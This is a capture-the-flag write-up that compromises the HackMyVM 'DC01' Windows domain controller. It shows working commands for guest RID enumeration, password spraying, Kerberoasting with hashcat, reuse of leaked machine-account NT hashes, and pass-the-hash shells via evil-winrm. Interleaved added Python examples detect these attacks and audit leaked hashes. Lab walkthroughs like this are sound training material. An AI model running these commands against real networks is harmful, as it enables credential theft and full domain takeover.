💻 DC01 Machine - HackMyVm
Reconnaissance
The first thing we do is identify the IP address of the target machine. For this we use arp-scan, a very handy tool for discovering live hosts on the network.
```bash
sudo arp-scan -I eth1 10.10.10.0/24
Interface: eth1, type: EN10MB, MAC: 08:00:27:41:0a:fa, IPv4: 10.10.10.101
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
10.10.10.1 0a:00:27:00:00:0a (Unknown: locally administered)
10.10.10.100 08:00:27:3e:6b:2c (Unknown)
10.10.10.104 08:00:27:39:de:29 (Unknown)
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.924 seconds (133.06 hosts/sec). 3 responded
```
Once the machine's IP address (10.10.10.104) is identified, we continue with an initial Nmap scan to gather information about the exposed services and possible attack vectors.
```bash
sudo nmap -sSCV -p- -n --min-rate 5000 10.10.10.104 -vvv -oN scan
Nmap scan report for 10.10.10.104
Host is up, received arp-response (0.0034s latency).
Scanned at 2026-02-12 05:58:27 EST for 124s
Not shown: 65518 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 128 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 128 Microsoft Windows Kerberos (server time: 2026-02-12 18:59:03Z)
135/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 128 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 128 Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL, Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 128
464/tcp open kpasswd5? syn-ack ttl 128
593/tcp open ncacn_http syn-ack ttl 128 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 128
3268/tcp open ldap syn-ack ttl 128 Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 128
5985/tcp open http syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf syn-ack ttl 128 .NET Message Framing
49664/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
49674/tcp open ncacn_http syn-ack ttl 128 Microsoft Windows RPC over HTTP 1.0
49687/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
MAC Address: 08:00:27:39:DE:29 (Oracle VirtualBox virtual NIC)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
```
From this information we can already identify the domain name, although we will confirm it with nxc.
```bash
nxc smb 10.10.10.104
SMB 10.10.10.104 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:None)
```
Now we confirm that the domain is SOUPEDECODE.LOCAL and that the hostname is DC01. With this information we add both to the /etc/hosts file.
Exploitation
We try to enumerate users with nxc against the SMB service and find that, without specifying a username or password, nothing is returned. However, setting guest as the user does give results.
```bash
nxc smb 10.10.10.104 -u 'guest' -p '' --rid-brute | grep 'SidTypeUser' | awk '{print $6}' | cut -d '\' -f 2 > domain_users.txt
```
Since we have no credentials for any user, we attempt an AS-REP Roasting attack, but in this case it returns nothing.
As an alternative, we try a password spraying attack to check whether any user has a password equal to their own username.
```bash
nxc smb 10.10.10.104 -u domain_users.txt -p domain_users.txt --no-bruteforce --continue-on-success | grep '[+]'
SMB 10.10.10.104 445 DC01 [+] SOUPEDECODE.LOCAL\ybob317:ybob317
```
And now we do get valid credentials: ybob317 : ybob317.
We proceed to review the shares available to this user to check whether we can reach additional information.
```bash
smbmap -H 10.10.10.104 -u ybob317 -p ybob317
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 10.10.10.104:445 Name: 10.10.10.104 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
backup NO ACCESS
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
Users READ ONLY
[*] Closed 1 connections
```
We access the Users share and read its contents.
This is where we get the first flag.
```bash
smbclient //10.10.10.104/Users -U 'ybob317%ybob317'
Try "help" to get a list of possible commands.
smb: \> cd ybob317\Desktop\
smb: \ybob317\Desktop\> dir
. DR 0 Mon Jun 17 13:45:32 2024
.. D 0 Mon Jun 17 13:24:32 2024
desktop.ini AHS 282 Mon Jun 17 13:24:32 2024
user.txt A 32 Wed Jun 12 07:54:32 2024
12942591 blocks of size 4096. 10961216 blocks available
```
The remaining folders turn out to be rabbit holes, so we look for other ways in.
Since we now have an extensive list of users, we try AS-REP Roasting again, but once more we get no hash.
However, now that we have a user with a valid password, we try Kerberoasting to see whether we get anything useful.
```bash
impacket-GetUserSPNs -request -dc-ip 10.10.10.104 -outputfile kerberoast_hashes.txt "SOUPEDECODE.LOCAL/ybob317:ybob317"
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------- -------------- -------- -------------------------- --------- ----------
FTP/FileServer file_svc 2024-06-17 13:32:23.726085 <never>
FW/ProxyServer firewall_svc 2024-06-17 13:28:32.710125 <never>
HTTP/BackupServer backup_svc 2024-06-17 13:28:49.476511 <never>
HTTP/WebServer web_svc 2024-06-17 13:29:04.569417 <never>
HTTPS/MonitoringServer monitoring_svc 2024-06-17 13:29:18.511871 <never>
```
We are in luck and have obtained the hashes of these service accounts, so we check whether they can be cracked.
```bash
hashcat -m 13100 -a 0 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt
```
After a short wait we obtain the credentials of file_svc : Password123!!.
We check whether it is possible to get a shell via SMB.
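Both the password spray against SMB above and the Kerberoast request leave a recognisable pattern in the domain controller's Security log: one source address failing logons (Event 4625) for many different accounts, and one account requesting service tickets (Event 4769) for many different SPNs with RC4 encryption, which is what GetUserSPNs asks for because those hashes crack fastest. The following is an added example, not code from the original write-up, showing a windowed detection for both over constructed event records; the field names follow the Windows event schema, the timestamps, addresses and account names are made up.

```python
"""Triage of constructed Windows Security events from a domain controller.

Added example, not part of the original write-up. The two techniques used
above leave distinct traces in the DC's Security log:
  * password spraying: one source address producing failed logons (4625)
    for many different accounts within a short window;
  * Kerberoasting: one account requesting service tickets (4769) for many
    different SPNs, typically with RC4 (TicketEncryptionType 0x17).
Every event below is constructed for the example; the field names follow the
Windows event schema, the values are made up.
"""
from collections import defaultdict
from datetime import datetime, timedelta

SPRAY_MIN_ACCOUNTS = 5      # distinct accounts per source before alerting
KERBEROAST_MIN_SPNS = 3     # distinct SPNs per requester before alerting
WINDOW = timedelta(minutes=5)
RC4_HMAC = 0x17             # TicketEncryptionType value for RC4-HMAC


def _window_hits(events, key_field, value_field, threshold):
    """Group events by key_field, slide WINDOW over each group's timestamps and
    return {key: peak distinct value_field count} for groups that reach the
    threshold inside one window."""
    by_key = defaultdict(list)
    for ev in events:
        by_key[ev[key_field]].append(ev)
    alerts = {}
    for key, evs in by_key.items():
        evs.sort(key=lambda e: e["time"])
        start = 0
        for end, ev in enumerate(evs):
            while ev["time"] - evs[start]["time"] > WINDOW:
                start += 1
            distinct = {e[value_field] for e in evs[start:end + 1]}
            if len(distinct) >= threshold:
                alerts[key] = max(len(distinct), alerts.get(key, 0))
    return alerts


def detect_spray(events):
    """Source addresses that failed logons (4625) against many distinct accounts."""
    failed = [e for e in events if e["EventID"] == 4625]
    return _window_hits(failed, "IpAddress", "TargetUserName", SPRAY_MIN_ACCOUNTS)


def detect_kerberoast(events):
    """Accounts requesting RC4 service tickets (4769) for many distinct SPNs.
    Computer accounts ($) are excluded: they legitimately request many."""
    tgs = [e for e in events
           if e["EventID"] == 4769
           and e["TicketEncryptionType"] == RC4_HMAC
           and not e["TargetUserName"].split("@")[0].endswith("$")]
    return _window_hits(tgs, "TargetUserName", "ServiceName", KERBEROAST_MIN_SPNS)


def _ev(minute, second, **fields):
    """Build one constructed event at a fixed base time plus an offset."""
    fields["time"] = datetime(2024, 6, 17, 13, 30) + timedelta(minutes=minute, seconds=second)
    return fields


SAMPLE_EVENTS = [
    # spray: six accounts from one source in 75 seconds (constructed)
    *[_ev(0, i * 15, EventID=4625, IpAddress="10.10.10.101", TargetUserName=u)
      for i, u in enumerate(["admin", "ybob317", "file_svc", "web_svc", "backup_svc", "jdoe"])],
    # benign: one user mistyping their password twice from another host
    _ev(1, 0, EventID=4625, IpAddress="10.10.10.50", TargetUserName="asmith"),
    _ev(1, 30, EventID=4625, IpAddress="10.10.10.50", TargetUserName="asmith"),
    # kerberoast: one user pulling RC4 tickets for five SPN-bearing accounts
    *[_ev(2, i * 5, EventID=4769, TargetUserName="ybob317@SOUPEDECODE.LOCAL",
          ServiceName=s, TicketEncryptionType=0x17)
      for i, s in enumerate(["file_svc", "firewall_svc", "backup_svc", "web_svc", "monitoring_svc"])],
    # benign: an AES ticket for one service, and a computer account's own traffic
    _ev(3, 0, EventID=4769, TargetUserName="asmith@SOUPEDECODE.LOCAL",
        ServiceName="web_svc", TicketEncryptionType=0x12),
    *[_ev(3, i, EventID=4769, TargetUserName="DC01$@SOUPEDECODE.LOCAL",
          ServiceName=s, TicketEncryptionType=0x17)
      for i, s in enumerate(["krbtgt", "ldap", "cifs", "host"])],
]

if __name__ == "__main__":
    print("spray sources      :", detect_spray(SAMPLE_EVENTS))
    print("kerberoast accounts:", detect_kerberoast(SAMPLE_EVENTS))
```

The thresholds and the five-minute window are starting points, not tuned values: a busy DC will need them raised, and the RC4 filter only matters while RC4 is still allowed for service accounts, which is itself the thing to fix (AES-only service accounts and long random passwords take the crackable hash off the table).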
```bash
nxc smb 10.10.10.104 -u 'file_svc' -p 'Password123!!'
SMB 10.10.10.104 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:None)
SMB 10.10.10.104 445 DC01 [+] SOUPEDECODE.LOCAL\file_svc:Password123!!
```
As we can see, the credentials are valid, but they do not give us a shell. So we enumerate the shares accessible to this account.
```bash
smbmap -H 10.10.10.104 -u 'file_svc' -p 'Password123!!'
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 10.10.10.104:445 Name: 10.10.10.104 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
backup READ ONLY
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
Users NO ACCESS
[*] Closed 1 connections
```
And, to our surprise, we can read a share named backup.
```bash
smbclient //10.10.10.104/backup -U 'file_svc%Password123!!'
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Mon Jun 17 13:41:17 2024
.. DR 0 Mon Jun 17 13:44:56 2024
backup_extract.txt A 892 Mon Jun 17 04:41:05 2024
12942591 blocks of size 4096. 10961091 blocks available
```
We see a file called backup_extract.txt, so we download it.
```bash
cat backup_extract.txt
WebServer$:2119:aad3b435b51404eeaad3b435b51404ee:c47b45f5d4df5a494bd19f13e14f7902:::
DatabaseServer$:2120:aad3b435b51404eeaad3b435b51404ee:406b424c7b483a42458bf6f545c936f7:::
CitrixServer$:2122:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
FileServer$:2065:aad3b435b51404eeaad3b435b51404ee:e41da7e79a4c76dbd9cf79d1cb325559:::
MailServer$:2124:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
BackupServer$:2125:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
ApplicationServer$:2126:aad3b435b51404eeaad3b435b51404ee:8cd90ac6cba6dde9d8038b068c17e9f5:::
PrintServer$:2127:aad3b435b51404eeaad3b435b51404ee:b8a38c432ac59ed00b2a373f4f050d28:::
ProxyServer$:2128:aad3b435b51404eeaad3b435b51404ee:4e3f0bb3e5b6e3e662611b1a87988881:::
MonitoringServer$:2129:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
```
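The file has the pwdump layout that Impacket's secretsdump writes (account:RID:LM:NT:::). Whoever is responding to a leak like this wants a quick inventory of it: which accounts are affected, whether any of them share an NT hash (identical passwords, so one cracked or replayed hash opens several hosts) and whether any NT hash is the well-known hash of an empty password. The following is an added example, not part of the original write-up, with a small parser and audit over a constructed dump that has the same shape as the file above but made-up hash values.

```python
"""Credential-hygiene inventory of a pwdump-style hash file.

Added example, not part of the original write-up. Each line has the
secretsdump layout:

    account:rid:lm_hash:nt_hash:::

The sample below is constructed: same shape as backup_extract.txt, made-up
hash values. Only the two well-known constants are real.
"""
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of an absent/empty password
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of an empty password
LINE_RE = re.compile(r"^([^:]+):(\d+):([0-9a-f]{32}):([0-9a-f]{32}):::$", re.I)


def parse_dump(text):
    """Return [(account, rid, lm, nt)]; malformed lines are skipped, which is
    what you want when a leaked file is partially corrupted."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            account, rid, lm, nt = m.groups()
            entries.append((account, int(rid), lm.lower(), nt.lower()))
    return entries


def audit(entries):
    """Summarise the dump from a defender's point of view."""
    by_nt = defaultdict(list)
    for account, _, _, nt in entries:
        by_nt[nt].append(account)
    return {
        "accounts": [a for a, *_ in entries],
        "machine_accounts": [a for a, *_ in entries if a.endswith("$")],
        # same NT hash on several accounts means the same password on each
        "shared_nt_hashes": {nt: accs for nt, accs in by_nt.items() if len(accs) > 1},
        "empty_passwords": [a for a, _, _, nt in entries if nt == EMPTY_NT],
        # a non-empty LM hash means LM storage is still enabled somewhere
        "lm_hashes_present": [a for a, _, lm, _ in entries if lm != EMPTY_LM],
    }


# Constructed sample: layout of backup_extract.txt, invented values.
SAMPLE_DUMP = """\
WebServer$:2119:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
MailServer$:2124:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
BackupServer$:2125:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
svc_legacy:1105:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
this line is corrupted and is skipped by the parser
"""

if __name__ == "__main__":
    for key, value in audit(parse_dump(SAMPLE_DUMP)).items():
        print(f"{key:18}: {value}")
```

Run over the real backup_extract.txt shown above, the shared-hash check reports two pairs of machine accounts with identical NT hashes (MailServer$ with BackupServer$, and CitrixServer$ with MonitoringServer$), which is exactly the kind of finding that turns "one hash leaked" into "rotate these accounts together".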
As we can see, we now have the hashes of several machine accounts in the domain. We check which of them are valid.
```bash
nxc smb 10.10.10.104 -u machines -H hashes | grep '[+]'
SMB 10.10.10.104 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:None)
SMB 10.10.10.104 445 DC01 [+] SOUPEDECODE.LOCAL\FileServrer$:e41da7e79a4c76dbd9cf79d1cb325559 (Pwn3d!)
```
Post-Exploitation
We find that, of all the hashes available, only the one for FileServer is valid. It is also flagged as Pwn3d!, so we check whether we can get a shell with evil-winrm.
```bash
evil-winrm -i 10.10.10.104 -u 'FileServer$' -H e41da7e79a4c76dbd9cf79d1cb325559
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FileServer$\Documents>
```
And we see that we can.
```powershell
*Evil-WinRM* PS C:\Users\FileServer$\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
======================= ============================================
soupedecode\fileserver$ S-1-5-21-2986980474-46765180-2505414164-2065
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
================================================== ================ =========================================== ===============================================================
SOUPEDECODE\Domain Computers Group S-1-5-21-2986980474-46765180-2505414164-515 Mandatory group, Enabled by default, Enabled group
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
SOUPEDECODE\Enterprise Admins Group S-1-5-21-2986980474-46765180-2505414164-519 Mandatory group, Enabled by default, Enabled group
SOUPEDECODE\Denied RODC Password Replication Group Alias S-1-5-21-2986980474-46765180-2505414164-572 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
```
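A computer account sitting in Enterprise Admins is the root cause of this whole escalation, and it is the kind of thing an administrator can catch in bulk by collecting whoami /all (or the token's group SIDs) and comparing the RID of each group SID against the well-known privileged RIDs. The following is an added example, not part of the original write-up: a parser that keys on SIDs rather than on column positions (the real output's column spacing varies), run over a constructed, abbreviated copy of the output above with a made-up domain SID.

```python
"""Flag privileged group membership in `whoami /all` output.

Added example, not part of the original write-up. The sample text is a
constructed, shortened version of the output above with an invented domain
SID; the parser keys on SIDs because column spacing in the real tool output
is not stable enough to split on.
"""
import re

# Well-known RIDs of groups that grant domain or host administration.
PRIVILEGED_RIDS = {
    512: "Domain Admins",
    516: "Domain Controllers",
    518: "Schema Admins",
    519: "Enterprise Admins",
    544: "Administrators",
    548: "Account Operators",
    549: "Server Operators",
    551: "Backup Operators",
}
# Domain SIDs (S-1-5-21-x-y-z-RID) and BUILTIN aliases (S-1-5-32-RID).
SID_RE = re.compile(r"S-1-5-(?:21-\d+-\d+-\d+|32)-(\d+)")


def _section(text, name):
    """Return the lines between the heading `name` and the next heading."""
    out, inside = [], False
    for line in text.splitlines():
        if line.strip().endswith(" INFORMATION"):
            inside = line.strip() == name
            continue
        if inside:
            out.append(line)
    return out


def parse_whoami(text):
    """Return (account_name, [(group_name, sid, rid)]) from whoami /all text."""
    user_lines = [l for l in _section(text, "USER INFORMATION") if "S-1-5-21" in l]
    user = user_lines[0].split()[0] if user_lines else None
    groups = []
    for line in _section(text, "GROUP INFORMATION"):
        m = SID_RE.search(line)
        if not m:
            continue   # header, separator, or a SID family we do not rate (Everyone, NT AUTHORITY...)
        name = line[:m.start()].strip()
        # drop the trailing Type column so only the group name remains
        name = re.sub(r"\s+(Well-known group|Group|Alias|Label)$", "", name)
        groups.append((name, m.group(0), int(m.group(1))))
    return user, groups


def privileged_memberships(text):
    """Return (account, is_machine_account, [(group_name, well_known_role)])."""
    user, groups = parse_whoami(text)
    hits = [(name, PRIVILEGED_RIDS[rid]) for name, _, rid in groups if rid in PRIVILEGED_RIDS]
    return user, bool(user and user.endswith("$")), hits


# Constructed sample: shape of the output above, invented domain SID.
SAMPLE_WHOAMI = r"""
USER INFORMATION
----------------
User Name               SID
======================= ============================================
soupedecode\fileserver$ S-1-5-21-1111111111-222222222-3333333333-2065

GROUP INFORMATION
-----------------
Group Name                    Type             SID                                          Attributes
============================= ================ ============================================ ===============
SOUPEDECODE\Domain Computers  Group            S-1-5-21-1111111111-222222222-3333333333-515 Mandatory group
Everyone                      Well-known group S-1-1-0                                      Mandatory group
BUILTIN\Users                 Alias            S-1-5-32-545                                 Mandatory group
BUILTIN\Administrators        Alias            S-1-5-32-544                                 Mandatory group, Group owner
SOUPEDECODE\Enterprise Admins Group            S-1-5-21-1111111111-222222222-3333333333-519 Mandatory group

PRIVILEGES INFORMATION
----------------------
Privilege Name    Description     State
SeDebugPrivilege  Debug programs  Enabled
"""

if __name__ == "__main__":
    account, is_machine, hits = privileged_memberships(SAMPLE_WHOAMI)
    print(f"{account} (machine account: {is_machine})")
    for group, role in hits:
        print(f"  privileged: {group} -> {role}")
```

A machine account in any of these groups, or in Administrators on its own DC, should be treated as a finding in its own right: a computer's password is never typed by a human, so nothing stops the hash in a backup or a share from being replayed exactly as it was here.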
As we can see, we hold a large number of privileges and belong to many groups. Membership in SOUPEDECODE\Enterprise Admins stands out in particular.
Thanks to this level of privilege, we can go straight to the Administrator's directory and read the flag.
```powershell
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 6/17/2024 10:41 AM backup
-a---- 6/17/2024 10:44 AM 32 root.txt
```
Alternatively, we could also have performed a DCSync against the DC.
